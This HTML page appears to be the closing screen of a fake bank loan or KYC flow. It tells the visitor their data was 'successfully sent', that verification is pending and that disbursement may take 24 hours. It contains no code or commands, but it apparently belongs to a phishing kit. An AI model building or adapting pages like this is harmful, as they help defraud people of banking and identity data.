<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>FINISH</title>
</head>
<style>
    body {
      margin: 0;
      padding: 0;
      background-color: white; /* Set your preferred background color */
      font-family: Arial, sans-serif;
    }

    .container {
      padding: 20px;
      max-width: 600px;
      margin: 0 auto;
      background-image: url('path/to/your/image.jpg'); /* Set your image path */
      background-size: cover;
      background-position: top left;
    }

    .logo {
      width: 50px; /* Set your preferred size */
      height: 50px; /* Set your preferred size */
      padding: 10px; /* Set your preferred padding */
    }

    .welcome-text {
      color: black;
      margin-top: 10px;
    }

    .login-box {
      background-color: white;
      padding: 20px;
      border: 2px solid #ccc;
      border-radius: 5px;
      margin-top: 20px;
      position: relative;
    }

    .input-group {
      margin-bottom: 15px;
    }

    input {
      width: 100%;
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 5px;
      box-sizing: border-box;
    }

    .forgot-text {
      color: #0361F0;
      position: absolute;
      bottom: 0;
      right: 0;
     font-family:verdana;
	
    }

    .login-btn {
      background-color: #0361F0; /* Set your preferred dark blue color */
      color: white;
      padding: 10px 90px;
      border: none;
      border-radius: 5px;
      display: block;
      margin: 0 auto;
      text-align: center;
      cursor: pointer;
    }

    .signup-box {
      background-color: #335287; /* Set your preferred grey color */
      padding: 15px;
      border-radius: 10px;
      margin-top: 20px;
    }

    .signup-text {
      text-align: center;
	color: white;
    }
  </style>
<body>
  <header>
<center>
    <img src="logo.png" alt="Bank Logo" class="logo">
  </header>
 <main>
<center> 
<div class="container">
  <h3 style="font-family:verdana;">
<img src="1.gif" alt="Loan Image" class="loan-image" width="max" align="center">
</br>
</br>
</br>
DATA SUCCESSFULLY SENT
 </h3>
   <h3 style="color:red"> KYC VERIFICATION PENDING </h3>
   it may take upto 24 Hours For Disbursement
</div>
  </main>
<center>
  <img src="image3.jpg" alt="Loan Image" class="loan-image">
  <center><label><marquee>THANK YOU FOR BANKING WITH US</marquee></label></center>
</body>
</html>